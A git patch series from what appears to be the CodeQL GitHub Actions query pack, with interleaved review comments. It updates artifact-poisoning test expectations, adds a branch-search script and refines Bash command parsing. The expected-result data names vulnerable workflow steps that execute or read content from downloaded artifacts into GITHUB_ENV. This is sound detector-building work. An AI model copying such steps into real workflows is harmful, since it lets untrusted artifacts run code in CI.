| steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo 
"::set-output name=pr_number::$(> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config 
| +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | 
Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e1532c06cdc..8d946507799 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,24 +1,21 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 
| Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | 
.github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | 
provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths From 48fa2967eda4212a5082b9a460351375152b2754 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:22:40 +0200 Subject: [PATCH 0579/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- search_branches.py | 88 ++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 90 insertions(+), 2 deletions(-) create mode 100644 search_branches.py diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 91329e4f347..229b1f81c7b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.65 +version: 0.1.66 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1689480b56b..e03e2a45cb7 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.65 +version: 0.1.66 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/search_branches.py b/search_branches.py new file mode 100644 index 00000000000..d0036169fea --- /dev/null +++ b/search_branches.py 
@@ -0,0 +1,88 @@ +import base64 +import os +import re +import sys +import time + +import requests + + +def handle_rate_limit(response, wait_time=60): + return False + + +def search_branches(repo_nwo, file_path, regex_pattern): + # GitHub API base URL + base_url = "https://api.github.com" + + # Get GitHub token from environment variable + github_token = os.environ.get("GITHUB_TOKEN") + if not github_token: + print("Error: GITHUB_TOKEN environment variable not set") + sys.exit(1) + + # Set up headers for authenticated requests + headers = { + "Authorization": f"token {github_token}", + "Accept": "application/vnd.github.v3+json", + } + + # Get all branches (with pagination) + branches_url = f"{base_url}/repos/{repo_nwo}/branches" + branches = [] + while branches_url: + branches_response = requests.get(branches_url, headers=headers) + if handle_rate_limit(branches_response): + continue + branches_response.raise_for_status() + branches.extend(branches_response.json()) + branches_url = branches_response.links.get("next", {}).get("url") + + # Compile the regex pattern + pattern = re.compile(regex_pattern) + + # Search file contents in each branch + for branch in branches: + branch_name = branch["name"] + file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}" + + while True: + file_response = requests.get(file_url, headers=headers) + + if file_response.status_code == 200: + file_content = file_response.json()["content"] + + decoded_content = base64.b64decode(file_content).decode("utf-8") + + if pattern.search(decoded_content): + print(f"Match found in branch: {branch_name}!!!!!") + else: + print(f"No match found in branch: {branch_name}") + break + elif file_response.status_code == 404: + print(f"File not found in branch: {branch_name}") + break + elif ( + file_response.status_code == 403 + and "X-RateLimit-Remaining" in file_response.headers + ): + if int(file_response.headers["X-RateLimit-Remaining"]) == 0: + reset_time = 
int(file_response.headers["X-RateLimit-Reset"]) + sleep_time = reset_time - int(time.time()) + 1 + print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") + time.sleep(sleep_time) + + +if __name__ == "__main__": + if len(sys.argv) != 4: + print("Usage: python search_branches.py ") + sys.exit(1) + + repo_nwo = sys.argv[1] + file_path = sys.argv[2] + regex_pattern = sys.argv[3] + + print( + f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" + ) + search_branches(repo_nwo, file_path, regex_pattern) From c7b57b5b771b5cbda25e252bffdcfc1900f18498 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:55:41 +0200 Subject: [PATCH 0580/1267] Merge command and file store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 ++++++------------- .../dataflow/internal/DataFlowPrivate.qll | 2 - 2 files changed, 18 insertions(+), 44 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index b0d98d2e659..787a5f72084 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -49,8 +49,15 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "bar=${foo}" >> "$GITHUB_OUTPUT" */ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and 
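Review bot: The `while True:` loop around the contents request in `search_branches` never exits for a response it does not recognise: any status other than 200 or 404, and a 403 whose `X-RateLimit-Remaining` header is missing or non-zero, falls through every branch and re-sends the same authenticated request with no delay. Give the loop an explicit `else` that reports the status and breaks, so that only the rate-limit sleep leads to a retry. Both `requests.get` calls also run without `timeout=`, so a stalled connection blocks the script indefinitely. `branch_name` is interpolated into the query string unencoded, so it is safer to pass it as `params={"ref": branch_name}`. `handle_rate_limit` always returns `False`, so the branch-listing loop has no rate-limit handling at all.

```python
contents_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}"

while True:
    file_response = requests.get(
        contents_url, headers=headers, params={"ref": branch_name}, timeout=30
    )
    # … unchanged: 200 and 404 branches …
    elif (
        file_response.status_code == 403
        and file_response.headers.get("X-RateLimit-Remaining") == "0"
    ):
        # … unchanged: sleep until X-RateLimit-Reset, then retry …
    else:
        print(f"Unexpected status {file_response.status_code} in branch: {branch_name}")
        break
```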
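Review bot: In `commandToOutputStoreStep` the `CommandSource` alternative, `exists(CommandSource source | source.getCommand() = cmd)`, compares only the command text and is not related to `run`, whereas the new `FileSource` alternative is restricted to steps that follow the source. As written, any `CommandSource` in the database with the same command string appears to satisfy it, so please confirm that is intended. The same disjunction is repeated verbatim in `commandToEnvStoreStep` (the `@@ -67,8 +74,15 @@` hunk) and could live in one private helper predicate taking `run` and `cmd`. The QLDoc above both predicates is not touched by these hunks (only its last example line is visible here); after the merge it should also mention content read from a downloaded artifact, e.g. `* A command output or partial file content that is written to GITHUB_OUTPUT.` Both predicate bodies continue outside the hunks.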
@@ -67,8 +74,15 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and @@ -76,41 +90,3 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl succ.asExpr() = run.getEnclosingJob() ) } - -/** - * A downloaded artifact that gets assigned to a Run step output. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" - * - run: | - * foo=$(> "$GITHUB_ENV" - */ -predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(FileSource source, Run run, string key, string cmd | - source.asExpr().(Step).getAFollowingStep() = run and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and - Bash::outputsPartialFileContent(run, cmd) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since there may not be an implicit env attribute - succ.asExpr() = run.getEnclosingJob() - ) -} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d7c3dad9ee7..cf95292588c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -351,8 +351,6 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - fileToOutputStoreStep(node1, node2, c) or - fileToEnvStoreStep(node1, node2, c) or commandToOutputStoreStep(node1, node2, c) or commandToEnvStoreStep(node1, node2, c) } From a09acb546228a9f11a2ddedd5c5a1ce4d80ea324 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:56:09 +0200 Subject: [PATCH 0581/1267] Better parsing of Bash script commands --- ql/lib/codeql/actions/Bash.qll | 15 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 107 ++++++++++++++---- .../actions/security/PoisonableSteps.qll | 2 +- 3 files changed, 95 insertions(+), 29 deletions(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 5907b601a46..fc9a75319eb 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -8,14 +8,21 @@ module Bash { string commandSeparator() { result = ["&&", "||"] } - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + string splitSeparator() { + result = stmtSeparator() or + result = commandSeparator() } string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + string pipeSeparator() { result = "|" } + + string separator() { + result = stmtSeparator() or + result = commandSeparator() or + result = pipeSeparator() + } + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a4b5778246a..eaf1ae871a9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
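Review bot: `splitSeparator()` and `separator()` differ only in whether `|` is included, and nothing in the `Bash` module says which one a caller should use. A one-line QLDoc on each would make the distinction explicit, for example `/** Separators that end a statement; pipes stay inside the statement. */` on `splitSeparator()` and `/** Separators that end a single command, including pipes. */` on `separator()`. The rename from `splitSeparators()` changes a name exported by the module; the callers in `Ast.qll` are updated in this commit, but other callers are not visible here.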
@@ -1438,39 +1438,43 @@ class RunImpl extends StepImpl { max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) } - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and // when splitting the line with a separator that is not present, the result is the original line which may contain other separators // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::splitSeparators()) > -1 + not result.indexOf(Bash::splitSeparator()) > -1 } - private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { round = 0 and - old = this.cmdProducer(line) and + old = this.stmtProducer(line) and new = old or round > 0 and exists(string middle, string target, string replacement | - this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and this.rankedQuotedStringReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) } - private string restoredQuotedStringLineProducer(int i) { + private string restoredStmtQuotedStringLineProducer(int i) { result = - max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) } - private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { round = 0 and - old = this.restoredQuotedStringLineProducer(line) and + old = this.restoredStmtQuotedStringLineProducer(line) and new = old or round 
> 0 and exists(string middle, string target, string replacement | - this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and this.rankedCmdSubstitutionReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) @@ -1479,7 +1483,7 @@ class RunImpl extends StepImpl { string getStmt(int i) { result = max(int round, string new | - this.doRestoreCmdSubstitutions(i, round, _, new) + this.doStmtRestoreCmdSubstitutions(i, round, _, new) | new order by round ) 
@@ -1487,6 +1491,73 @@ class RunImpl extends StepImpl { string getAStmt() { result = this.getStmt(_) } + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } + + string getCommand(int i) { + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", 
"done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + string getACommand() { result = this.getCommand(_) } + predicate getAssignment(int i, string name, string value) { exists(string stmt | stmt = this.getStmt(i) and @@ -1497,18 +1568,6 @@ class RunImpl extends StepImpl { predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } - string getCommand(int i) { - result = this.getStmt(i) and - // exclude the following keywords - not result = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", - "esac", "{", "}" - ] - } - - string getACommand() { result = this.getCommand(_) } - predicate getAWriteToGitHubEnv(string name, string value) { exists(string raw | Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index a0755f3582d..5e8731010ca 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getACommand().regexpFind(regexp, _, _)) + this.getACommand().regexpMatch("^" + regexp + ".*") ) } } From be87eccbe729abbbda912d476c586b3ffc2ca88b Mon Sep 17 00:00:00 2001 
